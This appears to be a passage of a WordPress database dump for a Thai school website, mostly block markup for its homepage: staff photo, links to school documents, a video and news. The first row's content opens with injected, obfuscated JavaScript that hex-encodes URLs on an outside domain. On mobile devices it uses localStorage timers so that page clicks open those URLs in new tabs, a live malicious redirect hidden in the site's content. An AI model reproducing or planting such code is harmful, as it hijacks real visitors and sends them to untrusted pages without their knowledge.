_0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:28:41','2024-08-28 02:28:41','',19,'http://watprato.ssk.in.th/?p=234',0,'revision','',0),
(235,2,'2024-08-28 09:33:33','2024-08-28 02:33:33','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} 